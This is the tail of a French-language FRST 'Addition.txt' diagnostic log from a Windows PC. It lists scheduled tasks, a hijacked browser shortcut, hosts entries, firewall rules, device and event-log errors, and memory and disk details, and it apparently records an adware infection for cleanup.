Task: {3CE8C7EC-A295-4302-9FFB-ACE57B8A963E} - System32\Tasks\{58FDE6D7-A507-4423-B1CD-66DFA0C6118A} => pcalua.exe -a "C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UN0CJUNZ\Range_RAT5_SD7_0_20_0_32Bit_Drivers_NonWHQL.exe" -d C:\Users\S\Desktop
Task: {4E471C21-2D48-4B22-818D-748894059341} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-12] (Adobe Systems Incorporated)
Task: {59067819-C31E-4DE5-A3E6-9F4C385E9858} - System32\Tasks\{9AC64293-8D59-4927-B206-521DAF17F654} => pcalua.exe -a "C:\Users\S\Downloads\MEI_Win7_8_8.1_9.5.24.1790_1.5M\Intel Control Center\SetupICC.exe" -d "C:\Users\S\Downloads\MEI_Win7_8_8.1_9.5.24.1790_1.5M\Intel Control Center"
Task: {6A47D549-64FF-4376-A22A-BF91BD82B4A9} - System32\Tasks\{DF825CEC-C542-4C5E-B97D-B59873CA86BE} => pcalua.exe -a "C:\Users\S\Downloads\Smart Technology 7_0_27_13 64Bit.exe" -d C:\Users\S\Downloads
Task: {734C3AC7-651B-4352-996F-F7C109F3701A} - System32\Tasks\{1F4A89EC-573E-4BEA-8104-7FC6597AC0DB} => pcalua.exe -a C:\ProgramData\HealthAlert\uninstall.exe -c /kb=y /ic=1
Task: {7A303B39-7CDA-4A1E-9891-0A011C6E1469} - System32\Tasks\{4FD1D25B-8F85-4B36-9D41-19E3BCE1E189} => pcalua.exe -a C:\Users\S\AppData\Roaming\omiga-plus\UninstallManager.exe -c -ptid=tugs <==== ATTENTION
Task: {83EF2014-E426-471A-8F68-9F3703DC3386} - System32\Tasks\{21ED9E85-E8AF-45E2-97A9-25CC8F78086A} => pcalua.exe -a "C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OZXP1FQ7\Range_RAT5_SD7_0_20_0_64Bit_Drivers_NonWHQL.exe" -d C:\Users\S\Desktop
Task: {9193837B-FC9A-4313-BBD2-EB2A8A277FC4} - System32\Tasks\{8DD57CC7-894A-4ED9-AB4F-2AC8F3A8E607} => pcalua.exe -a C:\Users\S\AppData\Roaming\mystartsearch\UninstallManager.exe -c -ptid=smt
Task: {96BA2B19-8421-47E0-AEBE-CD20ADC97CCE} - System32\Tasks\SMWUpd => C:\Program Files\Common Files\Goobzo\GBUpdate\updatehelper.exe <==== ATTENTION
Task: {DF37F4BC-4105-4B00-B85F-9780A2B2AD6B} - System32\Tasks\{E75605B3-C286-4A31-B8ED-8867D2947E21} => pcalua.exe -a "C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LGVVN9I5\logitech_logitech_setpoint_vista_4.70_4005.exe" -d C:\Users\S\Desktop
Task: {E983F2C8-8EEF-4318-87DB-608B4D8E06A6} - System32\Tasks\{A9193416-B523-460E-BD47-372064448461} => pcalua.exe -a "C:\Users\S\Downloads\Smart Technology 7_0_27_13 64Bit (1).exe" -d C:\Users\S\Downloads
Task: {F11B6C2A-DC03-4A55-A7E9-B4BD22A0FD4A} - System32\Tasks\Thufihaz => C:\PROGRA~1\SHOPPE~2\Uotuie.bat
Task: {F2E1E41B-212A-4E6D-A9F8-00AAAC743E37} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)
Task: {FD9906E6-A57B-4828-8351-3EAC75386662} - System32\Tasks\{A400D9BF-35AA-4908-A12C-26F78BFA9C0E} => pcalua.exe -a C:\Users\S\AppData\Roaming\omiga-plus\UninstallManager.exe -c -ptid=tugs <==== ATTENTION

(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Raccourcis =============================

(Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.)

ShortcutWithArgument: C:\Users\S\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G1Vzbwybl01,018946f8-eaae-4b0e-982f-6bfe16626fb9,

==================== Modules chargés (Avec liste blanche) ==============

2014-04-30 09:47 - 2010-03-15 10:28 - 00052224 _____ () C:\Program Files (x86)\WinRAR\rarext64.dll

==================== Alternate Data Streams (Avec liste blanche) =========

(Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.)

AlternateDataStreams: C:\Windows\system32\Drivers\sdfhgdf.sys:{2755e52c-c805-11e5-ae75-bcee7b86f8d3}
AlternateDataStreams: C:\Windows\system32\Drivers\sdfhgdf.sys:{2755e52d-c805-11e5-ae75-bcee7b86f8d3}
AlternateDataStreams: C:\ProgramData\TEMP:CB0AACC9

==================== Mode sans échec (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\zcengine => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="2"

==================== EXE Association (Avec liste blanche) ===============

(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.)


==================== Internet Explorer sites de confiance/sensibles ===============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.)

IE trusted site: HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts contenu: ==========================

(Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.)

2009-07-14 03:34 - 2016-01-31 16:56 - 00001110 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com
127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com

==================== Autres zones ============================

(Actuellement, il n'y a pas de correction automatique pour cette section.)

HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\S\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Le Pare-feu est activé.

==================== MSCONFIG/TASK MANAGER éléments désactivés ==

(Actuellement, il n'y a pas de correction automatique pour cette section.)

MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: CanonMyPrinter => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe /logon
MSCONFIG\startupreg: CanonSolutionMenuEx => C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE /logon
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: EADM => "C:\Program Files (x86)\Origin\Origin.exe" -AutoStart
MSCONFIG\startupreg: IJNetworkScanUtility => C:\Program Files (x86)\Canon\Canon IJ Network Scan Utility\CNMNSUT.exe
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: uTorrent => "C:\Users\S\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED

==================== RèglesPare-feu (Avec liste blanche) ===============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

FirewallRules: [{C51BA768-434F-4FA7-8B9A-1EAB74B3FE74}] => (Allow) LPort=2869
FirewallRules: [{E849B51B-A904-4540-A966-A3CB5E630F54}] => (Allow) LPort=1900
FirewallRules: [{571BB993-209C-4364-AD88-507291B6CCB3}] => (Allow) LPort=48113
FirewallRules: [{7B8A4614-E7E7-4F4C-A495-BD228E97FEEA}] => (Allow) LPort=48114
FirewallRules: [{04119AE3-D9B0-4726-8CD9-E1A1A349A327}] => (Allow) C:\Program Files\ma-config.com\MaConfigAgent.exe
FirewallRules: [{44AD60EB-BDA9-42CD-9FA4-2DA4FBA6AA07}] => (Allow) C:\Program Files\ma-config.com\MaConfigAgent.exe
FirewallRules: [{5F8D64A5-8A6B-4735-90BA-7C340C87C5E5}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [{C56C986F-5B24-4DF7-A459-6E363F2AC49E}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [{580D932D-BB64-4D57-A2BF-839E0A99AF90}] => (Allow) D:\Steam\SteamApps\common\Tomb Raider\TombRaider.exe
FirewallRules: [{743749BD-FBE0-4A75-8D11-8B692C1C2CC0}] => (Allow) D:\Steam\SteamApps\common\Tomb Raider\TombRaider.exe
FirewallRules: [{470C4500-087F-4D56-8A5D-517D5110E926}] => (Allow) D:\Steam\SteamApps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{2C8785C8-D09A-49D6-8BEE-99FA179CBB6C}] => (Allow) D:\Steam\SteamApps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{71232BDB-FCA0-428A-96B1-EC7379C0998F}] => (Allow) C:\Users\S\Downloads\utorrent [1].exe
FirewallRules: [{8B371F09-9114-47C8-A27C-2800E8166B2E}] => (Allow) C:\Users\S\Downloads\utorrent [1].exe
FirewallRules: [{EE284253-DAB7-4C89-9E04-9CE97DAF318C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2717\Agent.exe
FirewallRules: [{7E4F7406-3B1C-46DD-8E8C-A2736E5157E2}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2717\Agent.exe
FirewallRules: [{63C392BF-CBDB-4F02-9501-D79B08CD350B}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [{2E08C86F-1D22-4EBA-B317-BBC801EA6CEE}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [{BE52884A-6358-43D8-AE72-32322B18B315}] => (Allow) LPort=48113
FirewallRules: [{0CF80A71-6ABD-4330-960E-D1A1B2B28296}] => (Allow) LPort=48114
FirewallRules: [{F1A80149-767A-448E-94B9-D630F0630E63}] => (Allow) C:\Program Files\ma-config.com\MaConfigAgent.exe
FirewallRules: [{43564AE4-6FFA-4815-A015-CFBCDFFB1D8A}] => (Allow) C:\Program Files\ma-config.com\MaConfigAgent.exe
FirewallRules: [{7CC8C36F-1773-4033-A82E-13A6A9989C26}] => (Allow) D:\Steam\SteamApps\common\Company of Heroes 2\RelicCoH2.exe
FirewallRules: [{11288ACA-E1DE-44C1-A6C8-08309295E50A}] => (Allow) D:\Steam\SteamApps\common\Company of Heroes 2\RelicCoH2.exe
FirewallRules: [{30BCF3BC-697F-4F59-930E-587C21A486B5}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3.exe
FirewallRules: [{6053D713-9CCC-4E7D-8E57-B03B8CED1FA1}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3.exe
FirewallRules: [{6ABB8FDC-614D-4327-9C0A-DAB0F36919A1}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3launcher.exe
FirewallRules: [{66AE36BF-6DB2-4EF5-BA4B-CFF4BDD531FA}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3launcher.exe
FirewallRules: [{60F967FE-86AC-4722-9C5B-B10ED1D00814}] => (Allow) D:\Steam\bin\steamwebhelper.exe
FirewallRules: [{C4BC31FC-B3EC-480F-92C7-468790EBF13B}] => (Allow) D:\Steam\bin\steamwebhelper.exe
FirewallRules: [{0D14FCC2-D587-4BA2-B28A-C2EDB8A491FA}] => (Allow) D:\Steam\SteamApps\common\Resident Evil 6\BH6.exe
FirewallRules: [{DDFD09FD-1CD5-471B-8B84-1E7FBE0E72EF}] => (Allow) D:\Steam\SteamApps\common\Resident Evil 6\BH6.exe
FirewallRules: [{ED80D463-124E-4029-8ABF-5BE7ECCC62EC}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [{1363875E-A10D-405F-B245-C407F4D9D145}] => (Allow) D:\Steam\SteamApps\common\Batman Arkham Asylum GOTY\Binaries\BmLauncher.exe
FirewallRules: [{02CC81AA-4212-4B62-989A-BFB488A746D8}] => (Allow) D:\Steam\SteamApps\common\Batman Arkham Asylum GOTY\Binaries\BmLauncher.exe
FirewallRules: [{66230649-B67C-407F-8C33-164B0D84ECAF}] => (Allow) D:\Steam\SteamApps\common\Wargame European Escalation\WarGame.exe
FirewallRules: [{E99CAFA0-AA49-403E-A309-37C1B48EADD0}] => (Allow) D:\Steam\SteamApps\common\Wargame European Escalation\WarGame.exe
FirewallRules: [{7AC14ECB-D05C-4EE8-A4AC-BD2831830A7F}] => (Allow) D:\Steam\SteamApps\common\DCSWorld\Run.exe
FirewallRules: [{B9B7B4F2-28AF-4D07-995D-17661D610B3F}] => (Allow) D:\Steam\SteamApps\common\DCSWorld\Run.exe
FirewallRules: [{F9934C58-12E3-427E-A2C2-DD379D4FF4B8}] => (Allow) D:\Steam\SteamApps\common\Dying Light\DyingLightGame.exe
FirewallRules: [{9EFA8811-2DFB-45BF-9364-5E36A268BC4E}] => (Allow) D:\Steam\SteamApps\common\Dying Light\DyingLightGame.exe
FirewallRules: [{2AB22E9B-F1B4-4EE8-A5F5-4FD24ADE4190}] => (Allow) D:\Steam\SteamApps\common\Dying Light\DevTools\DyingLightPlayer.exe
FirewallRules: [{F4E8C2A1-25B2-49B0-ABD0-8AD218F385AF}] => (Allow) D:\Steam\SteamApps\common\Dying Light\DevTools\DyingLightPlayer.exe
FirewallRules: [{79FD950E-4921-4041-934E-2AAEBE29C7EC}] => (Allow) D:\Steam\SteamApps\common\Pro Cycling Manager 2015\PCM.exe
FirewallRules: [{16CC619C-CD61-4542-83EB-BEFEC8B10A84}] => (Allow) D:\Steam\SteamApps\common\Pro Cycling Manager 2015\PCM.exe
FirewallRules: [{5968AC68-86F4-4980-A792-7D88CCD7378E}] => (Allow) D:\Steam\SteamApps\common\sacred_citadel\sacredcitadel.exe
FirewallRules: [{011147AB-7B8B-4D27-86FA-1005D47E8FFD}] => (Allow) D:\Steam\SteamApps\common\sacred_citadel\sacredcitadel.exe
FirewallRules: [{D0F8B3F0-AA9C-443F-BAC0-C2FCF497D4D1}] => (Allow) D:\Jeux\FIFA 16 DEMO\fifasetup\fifaconfig.exe
FirewallRules: [{388D494D-160C-4FBB-B718-450856D0DA71}] => (Allow) D:\Jeux\FIFA 16 DEMO\fifasetup\fifaconfig.exe
FirewallRules: [TCP Query User{BD21F9DE-962F-4F31-9098-A48DD21F2BE2}D:\jeux\fifa 16 demo\fifa16_demo.exe] => (Allow) D:\jeux\fifa 16 demo\fifa16_demo.exe
FirewallRules: [UDP Query User{307F5FBF-7217-4855-952C-66CEDA5C261C}D:\jeux\fifa 16 demo\fifa16_demo.exe] => (Allow) D:\jeux\fifa 16 demo\fifa16_demo.exe
FirewallRules: [TCP Query User{D4EFAD81-23F3-4046-870D-91B378E27072}D:\jeux\fifa 16\fifa16.exe] => (Block) D:\jeux\fifa 16\fifa16.exe
FirewallRules: [UDP Query User{F33B1B13-4A55-4097-B2EE-62AF8FDB28C2}D:\jeux\fifa 16\fifa16.exe] => (Block) D:\jeux\fifa 16\fifa16.exe
FirewallRules: [{3A2BA855-BA90-4E1E-85E1-B10A174C17DB}] => (Allow) D:\Steam\SteamApps\common\Pool Nation FX\PoolNationFX\Binaries\Win64\PoolNationFX.exe
FirewallRules: [{D2F5592C-B1AA-4652-9989-454B05D1768D}] => (Allow) D:\Steam\SteamApps\common\Pool Nation FX\PoolNationFX\Binaries\Win64\PoolNationFX.exe
FirewallRules: [{7820A0C6-3228-4604-BD8F-0EBCF90CC9E2}] => (Allow) D:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{E3AA2BCD-F12B-4176-A684-27F7C5921FD5}] => (Allow) D:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{E1381A05-9A02-4225-91BD-D0F75B236E16}] => (Allow) D:\Jeux\FIFA 16\fifasetup\fifaconfig.exe
FirewallRules: [{CD599C23-1BB4-4DE6-9F48-D17C1DFE6465}] => (Allow) D:\Jeux\FIFA 16\fifasetup\fifaconfig.exe
FirewallRules: [{B77CE52F-14D8-4B60-BA76-BB0100AF7375}] => (Allow) C:\Users\S\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{48882307-714C-44E6-8457-FE2CF5681E0A}] => (Allow) C:\Users\S\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{C5E930C1-C9B5-4AEC-8937-DD435671DD7F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{19C31DCA-6C68-4A84-9B4A-4DC2DAC80EFE}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{AAE3BFA2-2B24-42F2-A08A-26AF8E6DD9B6}] => (Allow) D:\Steam\SteamApps\common\Dying Light\DevTools\DyingLightPlayer.exe
FirewallRules: [{E697E47B-EC80-43D8-8D4D-870DC2D3CD77}] => (Allow) D:\Steam\SteamApps\common\Dying Light\DevTools\DyingLightPlayer.exe

==================== Points de restauration =========================

03-02-2016 00:18:42 Windows Update
03-02-2016 15:45:11 Windows Update
12-02-2016 18:44:48 Windows Update
13-02-2016 00:02:56 Windows Update
16-02-2016 22:57:03 Windows Update

==================== Éléments en erreur du Gestionnaire de périphériques =============

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: Security Processor Loader Driver
Description: Security Processor Loader Driver
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: spldr
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: AMDA00 Interface
Description: AMDA00 Interface
Class Guid: {4d36e97d-e325-11ce-bfc1-08002be10318}
Manufacturer: ASUSTeK Computer Inc.
Service: WUDFRd
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: tbfd_1_10_0_16
Description: tbfd_1_10_0_16
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: tbfd_1_10_0_16
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Erreurs du Journal des événements: =========================

Erreurs Application:
==================
Error: (02/20/2016 11:52:05 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (02/20/2016 04:10:15 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (02/20/2016 04:08:21 PM) (Source: SideBySide) (EventID: 59) (User: )
Description: La création du contexte d’activation a échoué pour « 1 ». Erreur dans le fichier de manifeste ou de stratégie « 2 » à la ligne 3.
Syntaxe XML non valide.

Error: (02/20/2016 11:39:14 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (02/20/2016 11:37:20 AM) (Source: SideBySide) (EventID: 59) (User: )
Description: La création du contexte d’activation a échoué pour « 1 ». Erreur dans le fichier de manifeste ou de stratégie « 2 » à la ligne 3.
Syntaxe XML non valide.

Error: (02/20/2016 09:48:50 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (02/20/2016 09:46:56 AM) (Source: SideBySide) (EventID: 59) (User: )
Description: La création du contexte d’activation a échoué pour « 1 ». Erreur dans le fichier de manifeste ou de stratégie « 2 » à la ligne 3.
Syntaxe XML non valide.

Error: (02/19/2016 06:05:21 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (02/19/2016 06:03:27 PM) (Source: SideBySide) (EventID: 59) (User: )
Description: La création du contexte d’activation a échoué pour « 1 ». Erreur dans le fichier de manifeste ou de stratégie « 2 » à la ligne 3.
Syntaxe XML non valide.

Error: (02/18/2016 05:56:03 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


Erreurs système:
=============
Error: (02/20/2016 11:56:29 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Le service Explorateur d’ordinateurs dépend du service Serveur qui n’a pas pu démarrer en raison de l’erreur :
%%1068

Error: (02/20/2016 11:56:29 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Le service Explorateur d’ordinateurs dépend du service Serveur qui n’a pas pu démarrer en raison de l’erreur :
%%1068

Error: (02/20/2016 11:56:29 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Le service Explorateur d’ordinateurs dépend du service Serveur qui n’a pas pu démarrer en raison de l’erreur :
%%1068

Error: (02/20/2016 11:56:29 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Le service Explorateur d’ordinateurs dépend du service Serveur qui n’a pas pu démarrer en raison de l’erreur :
%%1068

Error: (02/20/2016 11:56:29 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Le service Explorateur d’ordinateurs dépend du service Serveur qui n’a pas pu démarrer en raison de l’erreur :
%%1068

Error: (02/20/2016 11:56:29 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Le service Explorateur d’ordinateurs dépend du service Serveur qui n’a pas pu démarrer en raison de l’erreur :
%%1068

Error: (02/20/2016 11:52:30 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Le service Explorateur d’ordinateurs dépend du service Serveur qui n’a pas pu démarrer en raison de l’erreur :
%%1068

Error: (02/20/2016 11:52:30 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Le service Explorateur d’ordinateurs dépend du service Serveur qui n’a pas pu démarrer en raison de l’erreur :
%%1068

Error: (02/20/2016 11:52:30 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Le service Explorateur d’ordinateurs dépend du service Serveur qui n’a pas pu démarrer en raison de l’erreur :
%%1068

Error: (02/20/2016 11:52:09 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Le service Énumérateur de bus IP PnP-X dépend du service Hôte du fournisseur de découverte de fonctions qui n’a pas pu démarrer en raison de l’erreur :
%%1068


CodeIntegrity:
===================================
Date: 2016-01-31 17:17:28.244
Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll car le jeu de hachages d’images par page n’a pas été trouvé sur le système.

Date: 2016-01-31 17:17:28.206
Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll car le jeu de hachages d’images par page n’a pas été trouvé sur le système.

Date: 2016-01-31 17:17:15.036
Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll car le jeu de hachages d’images par page n’a pas été trouvé sur le système.

Date: 2016-01-31 17:17:15.005
Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll car le jeu de hachages d’images par page n’a pas été trouvé sur le système.

Date: 2016-01-31 17:16:45.945
Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll car le jeu de hachages d’images par page n’a pas été trouvé sur le système.

Date: 2016-01-31 17:16:45.914
Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll car le jeu de hachages d’images par page n’a pas été trouvé sur le système.

Date: 2016-01-31 17:16:36.679
Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll car le jeu de hachages d’images par page n’a pas été trouvé sur le système.

Date: 2016-01-31 17:16:36.647
Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll car le jeu de hachages d’images par page n’a pas été trouvé sur le système.

Date: 2016-01-31 17:16:35.565
Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll car le jeu de hachages d’images par page n’a pas été trouvé sur le système.

Date: 2016-01-31 17:16:35.534
Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll car le jeu de hachages d’images par page n’a pas été trouvé sur le système.


==================== Infos Mémoire ===========================

Processeur: Intel(R) Core(TM) i5-4670K CPU @ 3.40GHz
Pourcentage de mémoire utilisée: 7%
Mémoire physique - RAM - totale: 16321.61 MB
Mémoire physique - RAM - disponible: 15028.15 MB
Mémoire virtuelle totale: 32641.43 MB
Mémoire virtuelle disponible: 31413.43 MB

==================== Lecteurs ================================

Drive c: () (Fixed) (Total:111.69 GB) (Free:19.63 GB) NTFS
Drive d: () (Fixed) (Total:1863.01 GB) (Free:1388.31 GB) NTFS
Drive e: (FIFA 16 (3 - 3)) (CDROM) (Total:3.45 GB) (Free:0 GB) UDF

==================== MBR & Table des partitions ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 111.8 GB) (Disk ID: CD50EF74)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=111.7 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 4E0BC8C4)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

==================== Fin de Addition.txt ============================